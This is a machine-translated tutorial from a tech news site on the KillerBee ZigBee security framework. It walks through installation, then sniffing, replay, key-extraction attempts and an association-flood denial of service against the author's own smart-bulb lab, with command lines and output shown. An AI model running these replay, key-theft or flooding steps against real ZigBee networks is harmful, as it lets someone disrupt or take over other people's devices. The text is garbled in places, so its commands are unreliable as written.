Shulou(Shulou.com)06/01 Report--

This article mainly introduces "the use of the KillBee framework". In the daily operation, I believe many people have doubts about the use of the KillBee framework. The editor consulted all kinds of materials and sorted out simple and easy-to-use methods of operation. I hope it will be helpful for you to answer the doubts about the use of the KillBee framework. Next, please follow the editor to study!

KillerBee framework

KillerBee attack framework, KillerBee is a framework and security research tool for ZigBee and IEEE 802.15.4 networks.

Framework requirements

KillerBee currently supports only Linux systems. The following Python modules must be installed before installation. On Ubuntu systems, you can install the required dependencies using the following command:

# apt-get install python-gtk2 python-cairo python-usb python-crypto python-serial python-dev libgcrypt-dev# git clone https://github.com/secdev/scapy# cd scapy# python setup.py install

Note: KillerBee is a powerful but not "friendly" testing platform, it is mainly for developers and senior analysts, so it is recommended that you first understand the ZigBee protocol.

Install KillerBee

KillerBee uses the standard Python "setup.py" installation file. Install KillerBee using the following command:

# python setup.py install directory structure

The directory structure of the KillerBee code is described as follows:

The HTML document in the doc-KillerBee library, provided by epydoc.

Firmware-firmware of supported KillerBee hardware devices.

Killerbee-Python library source code.

Sample-sample packet capture, referenced below.

Scripts-the Shell script used in development.

Tools-ZigBee and IEEE 802.15.4 attack tools developed using this framework.

Hardware requirements

The KillerBee framework currently supports a variety of devices, including River Loop ApiMote, Atmel RZ RAVEN transceivers, MoteIVTmote Sky, TelosB mote, Sewino sniffers, and various hardware running Silicon Labs Node Test firmware. A brief introduction to three of these hardware devices:

ApiMote v4 beta:Beta currently supports sniffing, injection, and blocking.

Tool introduction

KillerBee includes a variety of tools to attack ZigBee and IEEE 802.15.4 networks built using the KillerBee framework. Detailed instructions can be seen through the "- h" parameter, which is summarized below.

Zbid-identifies the available interfaces that can be used by KillerBee and associated tools.

Zbwireshark-similar to zbdump, but exposes a named pipe for real-time capture and viewing in Wireshark.

Zbdump-A tcpdump-like feature that captures ibpcap packet files. It can save packets in pcap and Daintree formats.

Zbreplay-performs a replay attack by reading data from a specified Daintree DCF or libpcap packet capture file and then retransmitting the frame. ACK frames are not resent.

Zbstumbler-activate ZigBee and IEEE 802.15.4 network discovery tools. The Zbstumbler sends a beacon request frame while hopping, recording and displaying summary information about the discovered device.

Zbdsniff-captures ZigBee traffic and looks for NWK frames and wireless key configurations. When the key is found, zbdsniff prints the key to stdout.

Zbkey-attempts to send a connection request to the coordinator to obtain the key.

Zbconvert-converts packet capture from Libpcap to Daintree SNA format and vice versa.

Zbfind-an GTK GUI application that tracks the location of the IEEE 802.15.4 transmitter by measuring RSSI.

Bscapy-provides an interactive Scapy shell for interaction through the KillerBee interface. Scapy must be installed to run this feature.

Framework introduction

KillerBee is primarily used to sniff packets in a packet capture file (libpcap or Daintree SNA) and to inject arbitrary packets. Accessibility features including IEEE 802.15.4 ZigBee NWK and ZigBee APS packet decoders are also available.

The KillerBee API is recorded in epydoc format, and the doc/ directory for this release contains HTML documents. If you have installed epydoc, you can also generate a convenient PDF to print as needed, as follows:

$cd killerbee$ mkdir pdf$ epydoc-- pdf-o pdf killerbee/

The pdf/ directory will contain a file called "api.pdf", which includes the framework documents.

Because KillerBee is a Python library, it integrates with other Python software. For example, the Sulley library is a fuzzy testing framework written by Pedram Amini in Python. The KillerBee framework uses it for packet injection to generate malformed ZigBee data and transfer it to the destination.

ZigBee Traffic Analysis ZigBee Network Environment

Build an intelligent light bulb system for ZigBee protocol communication, a total of four terminal devices (RGB lights, divided into 1, 2, 3, 4) and the ZigBee coordinator are used to communicate with each terminal device (lamp) network.

Use ApiMote

In the raspberry pie environment, after installing the KillerBee framework according to the previous introduction, we will begin to analyze and test the ZigBee traffic with the ApiMote hardware device on hand.

After ApiMote connects to the raspberry pie, the ApiMote (ID 0403 ID 6015) is automatically detected and the driver is loaded.

Root@raspberrypi:/home/pi/Desktop# lsusbBus 001 Device 005: ID 0403 Device 6015 Future Technology Devices International, Ltd Bridge (I2C/SPI/UART/FIFO) Bus 001 Device 003: ID 0424:ec00 Standard Microsystems Corp. SMSC9512/9514 Fast Ethernet AdapterBus 001 Device 002: ID 0424 ID 9514 Standard Microsystems Corp. SMC9514 HubBus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

ApiMote is usually pre-installed with firmware and does not need to be rewritten. If you need to brush the firmware, the steps are as follows:

The firmware of multiple devices is included in the firware/ directory. Select the firmware apimotev4_202011.hex of ApiMote

Running the flash_apimote.sh script, if the first time is out of sync and times out, sometimes it may take two attempts to flash correctly.

You can verify the firmware and list the devices by running sudo zbid.

Root@raspberrypi:/home/pi/Desktop# zbid Dev Product String Serial Number/dev/ttyUSB1 GoodFET Api-Mote v2 sniffing packets

Zbwireshark allows users to sniff and view ZigBee traffic in Wireshark in real time. The tool creates a pipe from which Wireshark then reads the data and displays it in real time.

Root@raspberrypi:/home/pi/Desktop# zbwireshark-f 15zbwireshark: listening on'/ dev/ttyUSB1', channel 15, page 0 (2425.0 MHz), link-type DLT_IEEE802_15_4, capture size 127 bytes

The-f parameter specifies the 15th channel.

You can also use zbdump to sniff and save packets in pcap and DainTree formats. Here we use pcap format to open the analysis protocol using wireshark, run zbdump below, and also use-f to specify the channel.

Root@raspberrypi:/home/pi/Desktop# zbdump-f 15-w test.pcap zbdump: listening on'/ dev/ttyUSB1', channel 15, page 0 (2425.0 MHz), link-type DLT_IEEE802_15_4, capture size 127bytes ^ C54 packets captured

Use wireshark to open captured packets

In the packet, the captured source and destination addresses are assigned a network ID, such as

PAN ID: 0xd85b

The 0x0000 is usually the coordinator.

0x0c08 is the ID assigned by one of the end devices to join the ZigBee network.

The extension address is the hardware address: 00:12:4b:00:22:30:5e:4b

Replay ZigBee traffic

By capturing the packet of the device, and then replaying the traffic back to the device.

Zbdump has just used this tool to save traffic to a packet file, and then uses the zbreply tool to replay the pcap file obtained from zbdump via ApiMote.

The-f parameter specifies the channel, the-w parameter specifies the pcap file used to write the captured packet, and the-r specifies the pcap file used to read the captured packet.

Root@raspberrypi:/home/pi/Desktop# zbdump-f 15-w operating.pcapzbdump: listening on'/ dev/ttyUSB0', channel 15, page 0 (2425.0 MHz), link-type DLT_IEEE802_15_4, capture size 127Bytes ^ C61 packets capturedroot@raspberrypi:/home/pi/Desktop# zbreplay-f 15-r operating.pcapzbreplay: retransmitting frames from 'operating.pcap' on interface' / dev/ttyUSB0' with a delay of 1.0 seconds.34 packets transmitted sniffer key

The zbdsniff tool can find the plaintext key key from the pcap file of the traffic packet crawled by the ZigBee network and return key.

Root@raspberrypi:/home/pi/Desktop# zbdsniff-f operating.pcap-k c028128de295be0708aebe9eedProcessing operating.pcap [+] Processed 1 capture files.

But I didn't get any output from the file, and I may not have found an available key.

The purpose of zbkey is similar to that of zbdsniff, except that zbkey sends a connection to the coordinator and then sends a data request to retrieve the key instead of scanning the pcap file. The-f parameter specifies the channel, the-s timing, and the-p parameter specifies the PAN ID,-a parameter and specifies the ZigBee hardware address. But did not return success.

Root@raspberrypi:/home/pi/Desktop# zbkey-f 15-s 0.1-p d85b-a 00124b0022305e4b Sending association packet...Sending data request packet...Received frame. ^ Length of packet received in associate_handle: 540000: 61 88 ac 5b d8 c4 10 0000 08 02 c4 10 0000 1e a.. [.0010: 81 28 49 b4 09 00 3a a9 da Fe ff 27 71 84 00 ce. (I...:....'q...0020: 8c 9f 39 98 2e 26 f8 2c d1 54 ca 0a d9 2d fb 6c.. 9. .T...-.l0030: 06 82 e3 29 03 00... Received frameLength of packet received in associate_handle: 500000: 61 88 cd 5b d8 08 0c a2 c4 02 08 0c 0000 1d a.. [.0010: 85 28 47 99 02 00 4b 5e 30 22 00 4b 12 0000 b5. (G. K ^ 0 ".K.0020: A9 58 f8 e2 96 ed ab 4f 9b 50 76 b4 99 d2 99 1a .X.O.Pv.0030: 09 d1.. Received frameLength of packet received in associate_handle: 50000: 02 00 af 45 e8... E.Sorry We didn't hear a device respond with an association response. Do you have an active target within range? Denial of service attack

The KillerBee framework provides a zbassocflood tool that attempts to send a large number of association requests to the target network. PAN ID (- p), channel (- c) and timing (- s) are required.

Root@raspberrypi:/home/pi/Desktop# zbassocflood-p d85b-c 15-s 0.1zbassocflood: Transmitting and receiving on interface'/ dev/ttyUSB0'. ^ CSent 13 associate requests.

The attack methods of KillerBee are roughly divided into: discovering devices (zbstumbler, zbopenear, zbfind), sniffing traffic (zbdump, zbwireshark), obtaining keys (zbdsniff, zbkey, zbgoodfind), replaying traffic (zbscapy, zbreplay), and denial of service (zbscapy, zbassocflood).

At this point, the study on "how to use the KillBee framework" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.